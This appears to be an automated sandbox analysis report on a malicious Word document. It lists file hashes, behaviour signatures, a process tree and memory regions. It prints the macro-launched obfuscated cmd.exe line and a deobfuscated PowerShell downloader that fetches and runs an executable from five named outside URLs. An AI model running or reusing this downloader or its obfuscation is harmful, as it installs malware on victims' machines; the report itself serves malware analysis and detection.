Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/05/2024, 11:36

General

  • Target

    6acfc827bf70cfd4fc9cd36f66ebba6c_JaffaCakes118.doc

  • Size

    124KB

  • MD5

    6acfc827bf70cfd4fc9cd36f66ebba6c

  • SHA1

    cb32b63048a1368cceb3a2114ca6fe640ee440cd

  • SHA256

    fbb1873ef58fdcc8f875e6450150e7a378e86deb32cb3525fd23d3791bf192ad

  • SHA512

    08fe27514c28daaaa5278ab990f84a0ceaf3075eda9d157f01739de20574a30e811b610c84a0e51cc011c875005411f041d6feabf6601895c04a5738505232ec

  • SSDEEP

    1536:nptJlmrJpmxlRw99NBc+aSwT+75RnuwACdRR2XGUggBlpF7xpy7RMANuk:pte2dw99fVtRIWwYMKuk

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://hollywoodgossip.biz/GpyDtTIIO1

exe.dropper

http://charpentier-couvreur-gironde.com/2Agu5kOrh7

exe.dropper

http://surprise-dj-team.com/2Atuefrxm

exe.dropper

http://spektramaxima.com/IXx8GGy

exe.dropper

http://dc.amegt.com/wp-content/QNhKWYE

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\6acfc827bf70cfd4fc9cd36f66ebba6c_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3408
    • C:\Windows\SYSTEM32\CMd.exe
      CMd /V/C"^s^e^t ^2Cv=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hc^t^ac^};^k^aerb;^a^G^P^$^ ^m^e^t^I^-^ekovn^I^;)^a^G^P^$^ ^,^J^P^G^$(e^l^i^F^d^ao^ln^w^o^D^.^J^A^h^$^{^yr^t^{)^kR^a^$^ n^i^ ^JP^G^$(^hc^a^er^o^f^;'^e^x^e^.^'^+^u^i^p^$^+^'^\^'^+c^i^l^b^u^p^:vn^e^$^=^a^G^P^$^;^'^5^2^7^'^ ^=^ ^u^i^p^$^;)'^@^'(^t^i^l^p^S.^'E^Y^W^K^hN^Q/^tn^e^tn^oc^-^p^w/^m^oc^.^tg^e^m^a^.c^d//^:^p^t^t^h^@^y^G^G^8^x^X^I/^moc^.^a^m^i^x^a^m^ar^tke^ps//^:^p^t^t^h^@^m^xr^f^e^u^t^A^2/^m^oc^.^m^a^e^t^-^j^d^-^e^s^ir^pr^u^s//^:^p^t^t^h^@^7^hr^Ok^5^u^g^A^2/^m^oc^.^e^dn^or^i^g^-r^u^erv^u^oc^-r^e^i^tn^e^pr^a^hc//^:^p^t^t^h^@^1^O^I^I^Tt^D^y^p^G/^z^i^b^.^p^i^s^s^o^g^d^o^ow^y^l^l^o^h//:p^t^t^h^'^=kR^a^$^;^tn^e^i^lC^b^e^W^.^t^eN^ ^tc^e^j^b^o^-^w^en^=^J^A^h^$^ ^l^l^e^h^sr^e^w^o^p&&^f^or /^L %^3 in (^4^0^8^,^-^1^,^0)^d^o ^s^e^t n^b^T^z=!n^b^T^z!!^2Cv:~%^3,1!&&^i^f %^3=^=^0 c^a^l^l %n^b^T^z:^*n^bT^z^!^=%"
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:1912
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $hAJ=new-object Net.WebClient;$aRk='http://hollywoodgossip.biz/GpyDtTIIO1@http://charpentier-couvreur-gironde.com/2Agu5kOrh7@http://surprise-dj-team.com/2Atuefrxm@http://spektramaxima.com/IXx8GGy@http://dc.amegt.com/wp-content/QNhKWYE'.Split('@');$piu = '725';$PGa=$env:public+'\'+$piu+'.exe';foreach($GPJ in $aRk){try{$hAJ.DownloadFile($GPJ, $PGa);Invoke-Item $PGa;break;}catch{}}
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4640

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\TCD8945.tmp\gb.xsl

          Filesize

          262KB

          MD5

          51d32ee5bc7ab811041f799652d26e04

          SHA1

          412193006aa3ef19e0a57e16acf86b830993024a

          SHA256

          6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

          SHA512

          5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v0ev50al.qnb.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Public\725.exe

          Filesize

          1KB

          MD5

          8f7f00a611329a46432d78bd304d4ecf

          SHA1

          9b62e33a58fbc143a722293a5cb165439fab3fcd

          SHA256

          9c6be0dcf9e7dfbfc9f7265a3cfd6e88cd63b642ae96a8528def16604c603d81

          SHA512

          2eb9ed2c353c4e366c45816f42242ef08fdee09bace338e45450ea1168e501fa3e6ac61af4cb68b51725f94f833530dec51559e36c7d2fa5895d85e5a308f40b

        • memory/3408-10-0x00007FF8BBD70000-0x00007FF8BBF65000-memory.dmp

          Filesize

          2.0MB

        • memory/3408-5-0x00007FF8BBE0D000-0x00007FF8BBE0E000-memory.dmp

          Filesize

          4KB

        • memory/3408-1-0x00007FF87BDF0000-0x00007FF87BE00000-memory.dmp

          Filesize

          64KB

        • memory/3408-9-0x00007FF8BBD70000-0x00007FF8BBF65000-memory.dmp

          Filesize

          2.0MB

        • memory/3408-8-0x00007FF8BBD70000-0x00007FF8BBF65000-memory.dmp

          Filesize

          2.0MB

        • memory/3408-11-0x00007FF8BBD70000-0x00007FF8BBF65000-memory.dmp

          Filesize

          2.0MB

        • memory/3408-2-0x00007FF87BDF0000-0x00007FF87BE00000-memory.dmp

          Filesize

          64KB

        • memory/3408-7-0x00007FF8BBD70000-0x00007FF8BBF65000-memory.dmp

          Filesize

          2.0MB

        • memory/3408-12-0x00007FF8BBD70000-0x00007FF8BBF65000-memory.dmp

          Filesize

          2.0MB

        • memory/3408-15-0x00007FF879D30000-0x00007FF879D40000-memory.dmp

          Filesize

          64KB

        • memory/3408-14-0x00007FF8BBD70000-0x00007FF8BBF65000-memory.dmp

          Filesize

          2.0MB

        • memory/3408-13-0x00007FF8BBD70000-0x00007FF8BBF65000-memory.dmp

          Filesize

          2.0MB

        • memory/3408-16-0x00007FF8BBD70000-0x00007FF8BBF65000-memory.dmp

          Filesize

          2.0MB

        • memory/3408-18-0x00007FF8BBD70000-0x00007FF8BBF65000-memory.dmp

          Filesize

          2.0MB

        • memory/3408-20-0x00007FF879D30000-0x00007FF879D40000-memory.dmp

          Filesize

          64KB

        • memory/3408-19-0x00007FF8BBD70000-0x00007FF8BBF65000-memory.dmp

          Filesize

          2.0MB

        • memory/3408-6-0x00007FF8BBD70000-0x00007FF8BBF65000-memory.dmp

          Filesize

          2.0MB

        • memory/3408-17-0x00007FF8BBD70000-0x00007FF8BBF65000-memory.dmp

          Filesize

          2.0MB

        • memory/3408-459-0x00007FF8BBD70000-0x00007FF8BBF65000-memory.dmp

          Filesize

          2.0MB

        • memory/3408-32-0x00007FF8BBD70000-0x00007FF8BBF65000-memory.dmp

          Filesize

          2.0MB

        • memory/3408-34-0x00007FF8BBD70000-0x00007FF8BBF65000-memory.dmp

          Filesize

          2.0MB

        • memory/3408-33-0x00007FF8BBD70000-0x00007FF8BBF65000-memory.dmp

          Filesize

          2.0MB

        • memory/3408-4-0x00007FF87BDF0000-0x00007FF87BE00000-memory.dmp

          Filesize

          64KB

        • memory/3408-576-0x00007FF8BBD70000-0x00007FF8BBF65000-memory.dmp

          Filesize

          2.0MB

        • memory/3408-3-0x00007FF87BDF0000-0x00007FF87BE00000-memory.dmp

          Filesize

          64KB

        • memory/3408-69-0x00007FF8BBD70000-0x00007FF8BBF65000-memory.dmp

          Filesize

          2.0MB

        • memory/3408-0-0x00007FF87BDF0000-0x00007FF87BE00000-memory.dmp

          Filesize

          64KB

        • memory/3408-358-0x00007FF8BBD70000-0x00007FF8BBF65000-memory.dmp

          Filesize

          2.0MB

        • memory/3408-30-0x00007FF8BBD70000-0x00007FF8BBF65000-memory.dmp

          Filesize

          2.0MB

        • memory/3408-513-0x00007FF8BBD70000-0x00007FF8BBF65000-memory.dmp

          Filesize

          2.0MB

        • memory/3408-523-0x00007FF8BBD70000-0x00007FF8BBF65000-memory.dmp

          Filesize

          2.0MB

        • memory/3408-573-0x00007FF87BDF0000-0x00007FF87BE00000-memory.dmp

          Filesize

          64KB

        • memory/3408-574-0x00007FF87BDF0000-0x00007FF87BE00000-memory.dmp

          Filesize

          64KB

        • memory/3408-572-0x00007FF87BDF0000-0x00007FF87BE00000-memory.dmp

          Filesize

          64KB

        • memory/3408-575-0x00007FF87BDF0000-0x00007FF87BE00000-memory.dmp

          Filesize

          64KB

        • memory/4640-55-0x0000026648340000-0x0000026648362000-memory.dmp

          Filesize

          136KB